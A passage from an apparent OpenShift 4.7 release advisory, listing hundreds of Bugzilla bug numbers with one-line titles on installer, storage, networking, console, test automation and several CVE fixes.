resources\n1900672 - (s390x) Upgrade from old LUKS to new not working with DASD disks\n1900699 - Impossible to add new Node on OCP 4.6 using large ECKD disks - fdasd issue\n1900759 - include qemu-guest-agent by default\n1900790 - Track all resource counts via telemetry\n1900835 - Multus errors when cachefile is not found\n1900935 - `oc adm release mirror` panic panic: runtime error\n1900989 - accessing the route cannot wake up the idled resources\n1901040 - When scaling down the status of the node is stuck on deleting\n1901057 - authentication operator health check failed when installing a cluster behind proxy\n1901107 - pod donut shows incorrect information\n1901111 - Installer dependencies are broken\n1901200 - linuxptp-daemon crash when enable debug log level\n1901301 - CBO should handle platform=BM without provisioning CR\n1901355 - [Azure][4.7] Invalid vm size from customized compute nodes does not fail properly\n1901363 - High Podready Latency due to timed out waiting for annotations\n1901373 - redundant bracket on snapshot restore button\n1901376 - [on-prem] Upgrade from 4.6 to 4.7 failed with \"timed out waiting for the condition during waitForControllerConfigToBeCompleted: controllerconfig is not completed: ControllerConfig has not completed: completed(false) running(false) failing(true\"\n1901395 - \"Edit virtual machine template\" action link should be removed\n1901472 - [OSP] Bootstrap and master nodes use different keepalived unicast setting\n1901517 - RHCOS 4.6.1 uses a single NetworkManager connection for multiple NICs when using default DHCP\n1901531 - Console returns a blank page while trying to create an operator Custom CR with Invalid Schema\n1901594 - Kubernetes resource CRUD operations.Kubernetes resource CRUD operations Pod \"before all\" hook for \"creates the resource instance\"\n1901604 - CNO blocks editing Kuryr options\n1901675 - [sig-network] multicast when using one of the plugins \u0027redhat/openshift-ovs-multitenant, redhat/openshift-ovs-networkpolicy\u0027 should allow multicast traffic in namespaces where it is enabled\n1901909 - The device plugin pods / cni pod are restarted every 5 minutes\n1901982 - [sig-builds][Feature:Builds] build can reference a cluster service  with a build being created from new-build should be able to run a build that references a cluster service\n1902019 - when podTopologySpreadConstraint strategy is enabled for descheduler it throws error\n1902059 - Wire a real signer for service accout issuer\n1902091 - `cluster-image-registry-operator` pod leaves connections open when fails connecting S3 storage\n1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service\n1902157 - The DaemonSet machine-api-termination-handler couldn\u0027t allocate Pod\n1902253 - MHC status doesnt set RemediationsAllowed = 0\n1902299 - Failed to mirror operator catalog - error: destination registry required\n1902545 - Cinder csi driver node pod should add nodeSelector for Linux\n1902546 - Cinder csi driver node pod doesn\u0027t run on master node\n1902547 - Cinder csi driver controller pod doesn\u0027t run on master node\n1902552 - Cinder csi driver does not use the downstream images\n1902595 - Project workloads list view doesn\u0027t show alert icon and hover message\n1902600 - Container csi-snapshotter in Cinder csi driver needs to use ImagePullPolicy=IfNotPresent\n1902601 - Cinder csi driver pods run as BestEffort qosClass\n1902653 - [BM][IPI] Master deployment failed: No valid host was found. Reason: No conductor service registered which supports driver redfish for conductor group\n1902702 - [sig-auth][Feature:LDAP][Serial] ldap group sync can sync groups from ldap: oc cp over non-existing directory/file fails\n1902746 - [BM][IP] Master deployment failed - Base.1.0.GeneralError: database is locked\n1902824 - failed to generate semver informed package manifest: unable to determine default channel\n1902894 - hybrid-overlay-node crashing trying to get node object during initialization\n1902969 - Cannot load vmi detail page\n1902981 - It should default to current namespace when create vm from template\n1902996 - [AWS] UPI on USGov, bootstrap machine can not fetch ignition file  via s3:// URI\n1903033 - duplicated lines of imageContentSources is seen when mirror release image to local registry\n1903034 - OLM continuously printing debug logs\n1903062 - [Cinder csi driver] Deployment mounted volume have no write access\n1903078 - Deleting VolumeSnapshotClass makes VolumeSnapshot not Ready\n1903107 - Enable vsphere-problem-detector e2e tests\n1903164 - OpenShift YAML editor jumps to top every few seconds\n1903165 - Improve Canary Status Condition handling for e2e tests\n1903172 - Column Management: Fix sticky footer on scroll\n1903186 - [Descheduler] cluster logs should report some info when PodTopologySpreadConstraints strategy is enabled\n1903188 - [Descheduler] cluster log reports failed to validate server configuration\" err=\"unsupported log format:\n1903192 - Role name missing on create role binding form\n1903196 - Popover positioning is misaligned for Overview Dashboard status items\n1903206 - Ingress controller incorrectly routes traffic to non-ready pods/backends. \n1903226 - MutatingWebhookConfiguration pod-identity-webhook does not exclude critical control-plane components\n1903248 - Backport Upstream Static Pod UID patch\n1903277 - Deprovisioning Not Deleting Security Groups [VpcLimitExceeded on e2e-aws tests]\n1903290 - Kubelet repeatedly log the same log line from exited containers\n1903346 - PV backed by FC lun is not being unmounted properly and this leads to IO errors / xfs corruption. \n1903382 - Panic when task-graph is canceled with a TaskNode with no tasks\n1903400 - Migrate a VM which is not running goes to pending state\n1903402 - Nic/Disk on VMI overview should link to VMI\u0027s nic/disk page\n1903414 - NodePort is not working when configuring an egress IP address\n1903424 - mapi_machine_phase_transition_seconds_sum doesn\u0027t work\n1903464 - \"Evaluating rule failed\" for \"record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum\" and \"record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum\"\n1903639 - Hostsubnet gatherer produces wrong output\n1903651 - Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service\n1903660 - Cannot install with Assisted Installer on top of IPv6 since network provider is not started\n1903674 - [sig-apps] ReplicationController should serve a basic image on each replica with a private image\n1903717 - Handle different Pod selectors for metal3 Deployment\n1903733 - Scale up followed by scale down can delete all running workers\n1903917 - Failed to load \"Developer Catalog\" page\n1903999 - Httplog response code is always zero\n1904026 - The quota controllers should resync on new resources and make progress\n1904064 - Automated cleaning is disabled by default\n1904124 - DHCP to static lease script doesn\u0027t work correctly if starting with infinite leases\n1904125 - Boostrap VM .ign image gets added into \u0027default\u0027 pool instead of \u003ccluster-name\u003e-\u003cid\u003e-bootstrap\n1904131 - kuryr tempest plugin test test_ipblock_network_policy_sg_rules fails\n1904133 - KubeletConfig flooded with failure conditions\n1904161 - AlertmanagerReceiversNotConfigured fires unconditionally on alertmanager restart\n1904243 - RHCOS 4.6.1 missing ISCSI initiatorname.iscsi !\n1904244 - MissingKey errors for two plugins using i18next.t\n1904262 - clusterresourceoverride-operator has version: 1.0.0 every build\n1904296 - VPA-operator has version: 1.0.0 every build\n1904297 - The index image generated by \"opm index prune\" leaves unrelated images\n1904305 - Should have scroll-down bar for the field which the values list has too many results under dashboards\n1904385 - [oVirt] registry cannot mount volume on 4.6.4 -\u003e 4.6.6 upgrade\n1904497 - vsphere-problem-detector: Run on vSphere cloud only\n1904501 - [Descheduler] descheduler does not evict any pod when PodTopologySpreadConstraint strategy is set\n1904502 - vsphere-problem-detector: allow longer timeouts for some operations\n1904503 - vsphere-problem-detector: emit alerts\n1904538 - [sig-arch][Early] Managed cluster should start all core operators: monitoring: container has runAsNonRoot and image has non-numeric user (nobody)\n1904578 - metric scraping for vsphere problem detector is not configured\n1904582 - All application traffic broken due to unexpected load balancer change on 4.6.4 -\u003e 4.6.6 upgrade\n1904663 - IPI pointer customization MachineConfig always generated\n1904679 - [Feature:ImageInfo] Image info should display information about images\n1904683 - `[sig-builds][Feature:Builds] s2i build with a root user image` tests use docker.io image\n1904684 - [sig-cli] oc debug ensure it works with image streams\n1904713 - Helm charts with kubeVersion restriction are filtered incorrectly\n1904776 - Snapshot modal alert is not pluralized\n1904824 - Set vSphere hostname from guestinfo before NM starts\n1904941 - Insights status is always showing a loading icon\n1904973 - KeyError: \u0027nodeName\u0027 on NP deletion\n1904985 - Prometheus and thanos sidecar targets are down\n1904993 - Many ampersand special characters are found in strings\n1905066 - QE - Monitoring test cases - smoke test suite automation\n1905074 - QE -Gherkin linter to maintain standards\n1905100 - Too many haproxy processes in default-router pod causing high load average\n1905104 - Snapshot modal disk items missing keys\n1905115 - CI: dev-scripts fail on 02_configure_host: Failed to start network ostestbm\n1905119 - Race in AWS EBS determining whether custom CA bundle is used\n1905128 - [e2e][automation] e2e tests succeed without actually execute\n1905133 - operator conditions special-resource-operator\n1905141 - vsphere-problem-detector: report metrics through telemetry\n1905146 - Backend Tests: TestHelmRepoGetter_SkipDisabled failures\n1905194 - Detecting broken connections to the Kube API takes up to 15 minutes\n1905221 - CVO transitions from \"Initializing\" to \"Updating\" despite not attempting many manifests\n1905232 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them failing due to inconsistent images between CI and OCP\n1905253 - Inaccurate text at bottom of Events page\n1905298 - openshift-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory\n1905299 - OLM fails to update operator\n1905307 - Provisioning CR is missing from must-gather\n1905319 - cluster-samples-operator containers are not requesting required memory resource\n1905320 - csi-snapshot-webhook is not requesting required memory resource\n1905323 - dns-operator is not requesting required memory resource\n1905324 - ingress-operator is not requesting required memory resource\n1905327 - openshift-kube-scheduler initContainer wait-for-host-port is not requesting required resources: cpu, memory\n1905328 - Changing the bound token service account issuer invalids previously issued bound tokens\n1905329 - openshift-oauth-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory\n1905330 - openshift-monitoring init-textfile is not requesting required resources: cpu, memory\n1905338 - QE -Cypress Automation for Add Flow - Database, Yaml, OperatorBacked, PageDetails\n1905347 - QE - Design Gherkin Scenarios\n1905348 - QE - Design Gherkin Scenarios\n1905362 - [sriov] Error message \u0027Fail to update DaemonSet\u0027 always shown in sriov operator pod\n1905368 - [sriov] net-attach-def generated from sriovnetwork cannot be restored once it was deleted\n1905370 - A-Z/Z-A sorting dropdown on Developer Catalog page is not aligned with filter text input\n1905380 - Default to Red Hat/KubeVirt provider if common template does not have provider annotation\n1905393 - CMO uses rbac.authorization.k8s.io/v1beta1 instead of rbac.authorization.k8s.io/v1\n1905404 - The example of \"Remove the entrypoint on the mysql:latest image\" for `oc image append` does not work\n1905416 - Hyperlink not working from Operator Description\n1905430 - usbguard extension fails to install because of missing correct protobuf dependency version\n1905492 - The stalld service has a higher scheduler priority than ksoftirq and rcu{b, c} threads\n1905502 - Test flake - unable to get https transport for ephemeral-registry\n1905542 - [GSS] The \"External\" mode option is not available when the OCP cluster is deployed using Redhat Cluster Assisted Installer 4.6. \n1905599 - Errant change to lastupdatetime in copied CSV status can trigger runaway csv syncs\n1905610 - Fix typo in export script\n1905621 - Protractor login test fails against a 4.7 (nightly) Power cluster\n1905640 - Subscription manual approval test is flaky\n1905647 - Report physical core valid-for-subscription min/max/cumulative use to telemetry\n1905696 - ClusterMoreUpdatesModal component did not get internationalized\n1905748 - with sharded ingresscontrollers, all shards reload when any endpoint changes\n1905761 - NetworkPolicy with Egress policyType is resulting in SDN errors and improper communication within Project\n1905778 - inconsistent ingresscontroller between fresh installed cluster and upgraded cluster\n1905792 - [OVN]Cannot create egressfirewalll with dnsName\n1905889 - Should create SA for each namespace that the operator scoped\n1905920 - Quickstart exit and restart\n1905941 - Page goes to error after create catalogsource\n1905977 - QE ghaekin design scenaio-pipeline metrics ODC-3711\n1906032 - Canary Controller: Canary daemonset rolls out slowly in large clusters\n1906100 - Disconnected cluster upgrades are failing from the cli, when signature retrieval is being blackholed instead of quickly rejected\n1906105 - CBO annotates an existing Metal3 deployment resource to indicate that it is managing it\n1906118 - OCS feature detection constantly polls storageclusters and storageclasses\n1906120 - \u0027Create Role Binding\u0027 form not setting user or group value when created from a user or group resource\n1906121 - [oc] After new-project creation, the kubeconfig file does not set the project\n1906134 - OLM should not create OperatorConditions for copied CSVs\n1906143 - CBO supports log levels\n1906186 - i18n: Translators are not able to translate `this` without context for alert manager config\n1906228 - tuned and openshift-tuned sometimes do not terminate gracefully, slowing reboots\n1906274 - StorageClass installed by Cinder csi driver operator should enable the allowVolumeExpansion to support volume resize. \n1906276 - `oc image append` can\u0027t work with multi-arch image with  --filter-by-os=\u0027.*\u0027\n1906318 - use proper term for Authorized SSH Keys\n1906335 - The lastTransitionTime, message, reason field of operatorcondition should be optional\n1906356 - Unify Clone PVC boot source flow with URL/Container boot source\n1906397 - IPA has incorrect kernel command line arguments\n1906441 - HorizontalNav and NavBar have invalid keys\n1906448 - Deploy using virtualmedia with provisioning network disabled fails - \u0027Failed to connect to the agent\u0027 in ironic-conductor log\n1906459 - openstack: Quota Validation fails if unlimited quotas are given to a project\n1906496 - [BUG] Thanos having possible memory leak consuming huge amounts of node\u0027s memory and killing them\n1906508 - TestHeaderNameCaseAdjust outputs nil error message on some failures\n1906511 - Root reprovisioning tests flaking often in CI\n1906517 - Validation is not robust enough and may prevent to generate install-confing. \n1906518 - Update snapshot API CRDs to v1\n1906519 - Update LSO CRDs to use v1\n1906570 - Number of disruptions caused by reboots on a cluster cannot be measured\n1906588 - [ci][sig-builds] nodes is forbidden: User \"e2e-test-jenkins-pipeline-xfghs-user\" cannot list resource \"nodes\" in API group \"\" at the cluster scope\n1906650 - Cannot collect network policy, EgressFirewall, egressip logs with gather_network_logs\n1906655 - [SDN]Cannot colloect ovsdb-server.log and ovs-vswitchd.log with gather_network_logs\n1906679 - quick start panel styles are not loaded\n1906683 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber\n1906684 - Event Source creation fails if user selects no app group and switch to yaml and then to form\n1906685 - SinkBinding is shown in topology view if underlying resource along with actual source created\n1906689 - user can pin to nav configmaps and secrets multiple times\n1906691 - Add doc which describes disabling helm chart repository\n1906713 - Quick starts not accesible for a developer user\n1906718 - helm chart \"provided by Redhat\" is misspelled\n1906732 - Machine API proxy support should be tested\n1906745 - Update Helm endpoints to use Helm 3.4.x\n1906760 - performance issues with topology constantly re-rendering\n1906766 - localized `Autoscaled` \u0026 `Autoscaling` pod texts overlap with the pod ring\n1906768 - Virtualization nav item is incorrectly placed in the Admin Workloads section\n1906769 - topology fails to load with non-kubeadmin user\n1906770 - shortcuts on mobiles view occupies a lot of space\n1906798 - Dev catalog customization doesn\u0027t update console-config ConfigMap\n1906806 - Allow installing extra packages in ironic container images\n1906808 - [test-disabled] ServiceAccounts should support OIDC discovery of service account issuer\n1906835 - Topology view shows add page before then showing full project workloads\n1906840 - ClusterOperator should not have status \"Updating\" if operator version is the same as the release version\n1906844 - EndpointSlice and EndpointSliceProxying feature gates should be disabled for openshift-sdn kube-proxy\n1906860 - Bump kube dependencies to v1.20 for Net Edge components\n1906864 - Quick Starts Tour: Need to adjust vertical spacing\n1906866 - Translations of Sample-Utils\n1906871 - White screen when sort by name in monitoring alerts page\n1906872 - Pipeline Tech Preview Badge Alignment\n1906875 - Provide an option to force backup even when API is not available. \n1906877 - Placeholder\u0027 value in search filter do not match column heading in Vulnerabilities\n1906879 - Add missing i18n keys\n1906880 - oidcdiscoveryendpoint controller invalidates all TokenRequest API tokens during install\n1906896 - No Alerts causes odd empty Table (Need no content message)\n1906898 - Missing User RoleBindings in the Project Access Web UI\n1906899 - Quick Start - Highlight Bounding Box Issue\n1906916 - Teach CVO about flowcontrol.apiserver.k8s.io/v1beta1\n1906933 - Cluster Autoscaler should have improved mechanisms for group identifiers\n1906935 - Delete resources when Provisioning CR is deleted\n1906968 - Must-gather should support collecting kubernetes-nmstate resources\n1906986 - Ensure failed pod adds are retried even if the pod object doesn\u0027t change\n1907199 - Need to upgrade machine-api-operator module version under cluster-api-provider-kubevirt\n1907202 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change\n1907211 - beta promotion of p\u0026f switched storage version to v1beta1, making downgrades impossible. \n1907269 - Tooltips data are different when checking stack or not checking stack for the same time\n1907280 - Install tour of OCS not available. \n1907282 - Topology page breaks with white screen\n1907286 - The default mhc machine-api-termination-handler couldn\u0027t watch spot instance\n1907287 - [csi-snapshot-webhook] should support both v1beta1 and v1 version when creating volumesnapshot/volumesnapshotcontent\n1907293 - Increase timeouts in e2e tests\n1907295 - Gherkin script for improve management for helm\n1907299 - Advanced Subscription Badge for KMS and Arbiter not present\n1907303 - Align VM template list items by baseline\n1907304 - Use PF styles for selected template card in VM Wizard\n1907305 - Drop \u0027ISO\u0027 from CDROM boot source message\n1907307 - Support and provider labels should be passed on between templates and sources\n1907310 - Pin action should be renamed to favorite\n1907312 - VM Template source popover is missing info about added date\n1907313 - ClusterOperator objects cannot be overriden with cvo-overrides\n1907328 - iproute-tc package is missing in ovn-kube image\n1907329 - CLUSTER_PROFILE env. variable is not used by the CVO\n1907333 - Node stuck in degraded state, mcp reports \"Failed to remove rollback: error running rpm-ostree cleanup -r: error: Timeout was reached\"\n1907373 - Rebase to kube 1.20.0\n1907375 - Bump to latest available 1.20.x k8s - workloads team\n1907378 - Gather netnamespaces networking info\n1907380 - kube-rbac-proxy exposes tokens, has excessive verbosity\n1907381 - OLM fails to deploy an operator if its deployment template contains a description annotation that doesn\u0027t match the CSV one\n1907390 - prometheus-adapter: panic after k8s 1.20 bump\n1907399 - build log icon link on topology nodes cause app to reload\n1907407 - Buildah version not accessible\n1907421 - [4.6.1]oc-image-mirror command failed on \"error: unable to copy layer\"\n1907453 - Dev Perspective -\u003e running vm details -\u003e resources -\u003e no data\n1907454 - Install PodConnectivityCheck CRD with CNO\n1907459 - \"The Boot source is also maintained by Red Hat.\" is always shown for all boot sources\n1907475 - Unable to estimate the error rate of ingress across the connected fleet\n1907480 - `Active alerts` section throwing forbidden error for users. \n1907518 - Kamelets/Eventsource should be shown to user if they have create access\n1907543 - Korean timestamps are shown when users\u0027 language preferences are set to German-en-en-US\n1907610 - Update kubernetes deps to 1.20\n1907612 - Update kubernetes deps to 1.20\n1907621 - openshift/installer: bump cluster-api-provider-kubevirt version\n1907628 - Installer does not set primary subnet consistently\n1907632 - Operator Registry should update its kubernetes dependencies to 1.20\n1907639 - pass dual-stack node IPs to kubelet in dual-stack clusters\n1907644 - fix up handling of non-critical annotations on daemonsets/deployments\n1907660 - Pod list does not render cell height correctly when pod names are too long (dynamic table rerendering issue?)\n1907670 - CVE-2020-27846 crewjam/saml: authentication bypass in saml authentication\n1907671 - Ingress VIP assigned to two infra nodes simultaneously - keepalived process running in pods seems to fail\n1907767 - [e2e][automation]update test suite for kubevirt plugin\n1907770 - Recent RHCOS 47.83 builds (from rhcos-47.83.202012072210-0 on) don\u0027t allow master and worker nodes to boot\n1907792 - The `overrides` of the OperatorCondition cannot block the operator upgrade\n1907793 - Surface support info in VM template details\n1907812 - 4.7 to 4.6 downgrade stuck in clusteroperator storage\n1907822 - [OCP on OSP] openshift-install panic when checking quota with install-config have no flavor set\n1907863 - Quickstarts status not updating when starting the tour\n1907872 - dual stack with an ipv6 network fails on bootstrap phase\n1907874 - QE - Design Gherkin Scenarios for epic ODC-5057\n1907875 - No response when try to expand pvc with an invalid size\n1907876 - Refactoring record package to make gatherer configurable\n1907877 - QE - Automation- pipelines builder scripts\n1907883 - Fix Pipleine creation without namespace issue\n1907888 - Fix pipeline list page loader\n1907890 - Misleading and incomplete alert message shown in pipeline-parameters and pipeline-resources form\n1907892 - Unable to edit application deployed using \"From Devfile\" option\n1907893 - navSortUtils.spec.ts unit test failure\n1907896 - When a workload is added, Topology does not place the new items well\n1907908 - VM Wizard always uses VirtIO for the VM rootdisk regardless what is defined in common-template\n1907924 - Enable madvdontneed in OpenShift Images\n1907929 - Enable madvdontneed in OpenShift System Components Part 2\n1907936 - NTO is not reporting nto_profile_set_total metrics correctly after reboot\n1907947 - The kubeconfig saved in tenantcluster shouldn\u0027t include anything that is not related to the current context\n1907948 - OCM-O bump to k8s 1.20\n1907952 - bump to k8s 1.20\n1907972 - Update OCM link to open Insights tab\n1907989 - DataVolumes was intorduced in common templates - VM creation fails in the UI\n1907998 - Gather kube_pod_resource_request/limit metrics as exposed in upstream KEP 1916\n1908001 - [CVE-2020-10749] Update github.com/containernetworking/plugins to v.0.8.6 in egress-router-cni\n1908014 - e2e-aws-ansible and e2e-aws-helm are broken in ocp-release-operator-sdk\n1908035 - dynamic-demo-plugin build does not generate dist directory\n1908135 - quick search modal is not centered over topology\n1908145 - kube-scheduler-recovery-controller container crash loop when router pod is co-scheduled\n1908159 - [AWS C2S] MCO fails to sync cloud config\n1908171 - GCP: Installation fails when installing cluster with n1-custom-4-16384custom type (n1-custom-4-16384)\n1908180 - Add source for template is stucking in preparing pvc\n1908217 - CI: Server-Side Apply should work for oauth.openshift.io/v1: has no tokens\n1908231 - [Migration] The pods ovnkube-node are in  CrashLoopBackOff after SDN to OVN\n1908277 - QE - Automation- pipelines actions scripts\n1908280 - Documentation describing `ignore-volume-az` is incorrect\n1908296 - Fix pipeline builder form yaml switcher validation issue\n1908303 - [CVE-2020-28367 CVE-2020-28366] Remove CGO flag from rhel Dockerfile in Egress-Router-CNI\n1908323 - Create button missing for PLR in the search page\n1908342 - The new pv_collector_total_pv_count is not reported via telemetry\n1908344 - [vsphere-problem-detector] CheckNodeProviderID and CheckNodeDiskUUID have the same name\n1908347 - CVO overwrites ValidatingWebhookConfiguration for snapshots\n1908349 - Volume snapshot tests are failing after 1.20 rebase\n1908353 - QE - Automation- pipelines runs scripts\n1908361 - bump to k8s 1.20\n1908367 - QE - Automation- pipelines triggers scripts\n1908370 - QE - Automation- pipelines secrets scripts\n1908375 - QE - Automation- pipelines workspaces scripts\n1908381 - Go Dependency Fixes for Devfile Lib\n1908389 - Loadbalancer Sync failing on Azure\n1908400 - Tests-e2e, increase timeouts, re-add TestArchiveUploadedAndResultsReceived\n1908407 - Backport Upstream 95269 to fix potential crash in kubelet\n1908410 - Exclude Yarn from VSCode search\n1908425 - Create Role Binding form subject type and name are undefined when All Project is selected\n1908431 - When the marketplace-operator pod get\u0027s restarted, the custom catalogsources are gone, as well as the pods\n1908434 - Remove \u0026apos from metal3-plugin internationalized strings\n1908437 - Operator backed with no icon has no badge associated with the CSV tag\n1908459 - bump to k8s 1.20\n1908461 - Add bugzilla component to OWNERS file\n1908462 - RHCOS 4.6 ostree removed dhclient\n1908466 - CAPO AZ Screening/Validating\n1908467 - Zoom in and zoom out in topology package should be sentence case\n1908468 - [Azure][4.7] Installer can\u0027t properly parse instance type with non integer memory size\n1908469 - nbdb failed to come up while bringing up OVNKubernetes cluster\n1908471 - OLM should bump k8s dependencies to 1.20\n1908484 - oc adm release extract --cloud=aws --credentials-requests dumps all manifests\n1908493 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM\n1908545 - VM clone dialog does not open\n1908557 - [e2e][automation]Miss css id on bootsource and reviewcreate step on wizard\n1908562 - Pod readiness is not being observed in real world cases\n1908565 - [4.6] Cannot filter the platform/arch of the index image\n1908573 - Align the style of flavor\n1908583 - bootstrap does not run on additional networks if configured for master in install-config\n1908596 - Race condition on operator installation\n1908598 - Persistent Dashboard shows events for all provisioners\n1908641 - Go back to Catalog Page link on Virtual Machine page vanishes on empty state\n1908648 - Skip TestKernelType test on OKD, adjust TestExtensions\n1908650 - The title of customize wizard is inconsistent\n1908654 - cluster-api-provider: volumes and disks names shouldn\u0027t change by machine-api-operator\n1908675 - Reenable [sig-storage] CSI mock volume CSI FSGroupPolicy [LinuxOnly] should modify fsGroup if fsGroupPolicy=default [Suite:openshift/conformance/parallel] [Suite:k8s]\n1908687 - Option to save user settings separate when using local bridge (affects console developers only)\n1908697 - Show `kubectl diff ` command in the oc diff help page\n1908715 - Pressing the arrow up key when on topmost quick-search list item it should loop back to bottom\n1908716 - UI breaks on click of sidebar of ksvc (if revisions not up) in topology on 4.7 builds\n1908717 - \"missing unit character in duration\" error in some network dashboards\n1908746 - [Safari] Drop Shadow doesn\u0027t works as expected on hover on workload\n1908747 - stale S3 CredentialsRequest in CCO manifest\n1908758 - AWS: NLB timeout value is rejected by AWS cloud provider after 1.20 rebase\n1908830 - RHCOS 4.6 - Missing Initiatorname\n1908868 - Update empty state message for EventSources and Channels tab\n1908880 - 4.7 aws-serial CI: NoExecuteTaintManager Single Pod [Serial] eventually evict pod with finite tolerations from tainted nodes\n1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference\n1908888 - Dualstack does not work with multiple gateways\n1908889 - Bump CNO to k8s 1.20\n1908891 - TestDNSForwarding DNS operator e2e test is failing frequently\n1908914 - CNO: upgrade nodes before masters\n1908918 - Pipeline builder yaml view sidebar is not responsive\n1908960 - QE - Design Gherkin Scenarios\n1908971 - Gherkin Script for pipeline debt 4.7\n1908983 - i18n: Add Horizontal Pod Autoscaler action menu is not translated\n1908997 - Unsupported access mode should not be available when creating pvc by cinder-csi-driver/gcp-pd-csi-driver from web-console\n1908998 - [cinder-csi-driver] doesn\u0027t detect the credentials change\n1909004 - \"No datapoints found\" for RHEL node\u0027s filesystem graph\n1909005 - i18n: workloads list view heading is not translated\n1909012 - csi snapshot webhook does not block any invalid update for volumesnapshot and volumesnapshotcontent objects\n1909027 - Disks option of Sectected capacity chart shows HDD disk even on selection of SDD disk type\n1909043 - OCP + OCS 4.7 Internal - Storage cluster creation throws warning when zone=0 in VMware\n1909067 - Web terminal should keep latest output when connection closes\n1909070 - PLR and TR Logs component is not streaming as fast as tkn\n1909092 - Error Message should not confuse user on Channel form\n1909096 - OCP 4.7+OCS 4.7 - The Requested Cluster Capacity field needs to include the selected capacity in calculation in Review and Create Page\n1909108 - Machine API components should use 1.20 dependencies\n1909116 - Catalog Sort Items dropdown is not aligned on Firefox\n1909198 - Move Sink action option is not working\n1909207 - Accessibility Issue on monitoring page\n1909236 - Remove pinned icon overlap on resource name\n1909249 - Intermittent packet drop from pod to pod\n1909276 - Accessibility Issue on create project modal\n1909289 - oc debug of an init container no longer works\n1909290 - Logging may be broken due to mix of k8s.io/klog v1 and v2\n1909358 - registry.redhat.io/redhat/community-operator-index:latest only have hyperfoil-bundle\n1909453 - Boot disk RAID can corrupt ESP if UEFI firmware writes to it\n1909455 - Boot disk RAID will not boot if the primary disk enumerates but fails I/O\n1909464 - Build operator-registry with golang-1.15\n1909502 - NO_PROXY is not matched between bootstrap and global cluster setting which lead to desired master machineconfig is not found\n1909521 - Add kubevirt cluster type for e2e-test workflow\n1909527 - [IPI Baremetal] After upgrade from 4.6 to 4.7 metal3 pod does not get created\n1909587 - [OCP4] all of the OCP master nodes with soft-anti-affinity run on the same OSP node\n1909610 - Fix available capacity when no storage class selected\n1909678 - scale up / down buttons available on pod details side panel\n1909723 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder \u0026 base images to be consistent with ART\n1909730 - unbound variable error if EXTRA_PKGS_LIST is not defined\n1909739 - Arbiter request data changes\n1909744 - cluster-api-provider-openstack: Bump gophercloud\n1909790 - PipelineBuilder yaml view cannot be used for editing a pipeline\n1909791 - Update standalone kube-proxy config for EndpointSlice\n1909792 - Empty states for some details page subcomponents are not i18ned\n1909815 - Perspective switcher is only half-i18ned\n1909821 - OCS 4.7 LSO installation blocked because of Error \"Invalid value: \"integer\": spec.flexibleScaling in body\n1909836 - operator-install-global Cypress test was failing in OLM as it depends on an operator that isn\u0027t installed in CI\n1909864 - promote-release-openshift-machine-os-content-e2e-aws-4.5 is perm failing\n1909911 - [OVN]EgressFirewall caused a segfault\n1909943 - Upgrade from 4.6 to 4.7 stuck due to write /sys/devices/xxxx/block/sda/queue/scheduler: invalid argument\n1909958 - Support Quick Start Highlights Properly\n1909978 - ignore-volume-az = yes not working on standard storageClass\n1909981 - Improve statement in template select step\n1909992 - Fail to pull the bundle image when using the private index image\n1910024 - Reload issue in latest(4.7) UI code on 4.6 cluster locally in dev\n1910036 - QE - Design Gherkin Scenarios ODC-4504\n1910049 - UPI: ansible-galaxy is not supported\n1910127 - [UPI on oVirt]:  Improve UPI Documentation\n1910140 - fix the api dashboard with changes in upstream kube 1.20\n1910160 - If two OperatorConditions include the same deployments they will keep updating the deployment\u0027s containers with the OPERATOR_CONDITION_NAME Environment Variable\n1910165 - DHCP to static lease script doesn\u0027t handle multiple addresses\n1910305 - [Descheduler] - The minKubeVersion should be 1.20.0\n1910409 - Notification drawer is not localized for i18n\n1910459 - Could not provision gcp volume if delete secret gcp-pd-cloud-credentials\n1910492 - KMS details are auto-populated on the screen in next attempt at Storage cluster creation\n1910501 - Installed Operators-\u003eOperand required: Clicking on cancel in Storage cluster page takes back to the Install Operator page\n1910533 - [OVN] It takes about 5 minutes for EgressIP failover to work\n1910581 - library-go: proxy ENV is not injected into csi-driver-controller which lead to storage operator never get ready\n1910666 - Creating a Source Secret from type SSH-Key should use monospace font for better usability\n1910738 - OCP 4.7 Installation fails on VMWare due to 1 worker that is degraded\n1910739 - Redfish-virtualmedia (idrac) deploy fails on \"The Virtual Media image server is already connected\"\n1910753 - Support Directory Path to Devfile\n1910805 - Missing translation for Pipeline status and breadcrumb text\n1910829 - Cannot delete a PVC if the dv\u0027s phase is WaitForFirstConsumer\n1910840 - Show Nonexistent  command info in the `oc rollback -h` help page\n1910859 - breadcrumbs doesn\u0027t use last namespace\n1910866 - Unify templates string\n1910870 - Unify template dropdown action\n1911016 - Prometheus unable to mount NFS volumes after upgrading to 4.6\n1911129 - Monitoring charts renders nothing when switching from a Deployment to \"All workloads\"\n1911176 - [MSTR-998] Wrong text shown when hovering on lines of charts in API Performance dashboard\n1911212 - [MSTR-998] API Performance Dashboard \"Period\" drop-down has a choice \"$__auto_interval_period\" which can bring \"1:154: parse error: missing unit character in duration\"\n1911213 - Wrong and misleading warning for VMs that were created manually (not from template)\n1911257 - [aws-c2s] failed to create cluster, kube-cloud-config was not created\n1911269 - waiting for the build message present when build exists\n1911280 - Builder images are not detected for Dotnet, Httpd, NGINX\n1911307 - Pod Scale-up requires extra privileges in OpenShift web-console\n1911381 - \"Select Persistent Volume Claim project\" shows in customize wizard when select a source available template\n1911382 - \"source volumeMode (Block) and target volumeMode (Filesystem) do not match\" shows in VM Error\n1911387 - Hit error - \"Cannot read property \u0027value\u0027 of undefined\" while creating VM from template\n1911408 - [e2e][automation] Add auto-clone cli tests and new flow of VM creation\n1911418 - [v2v] The target storage class name is not displayed if default storage class is used\n1911434 - git ops empty state page displays icon with watermark\n1911443 - SSH Cretifiaction field should be validated\n1911465 - IOPS display wrong unit\n1911474 - Devfile Application Group Does Not Delete Cleanly 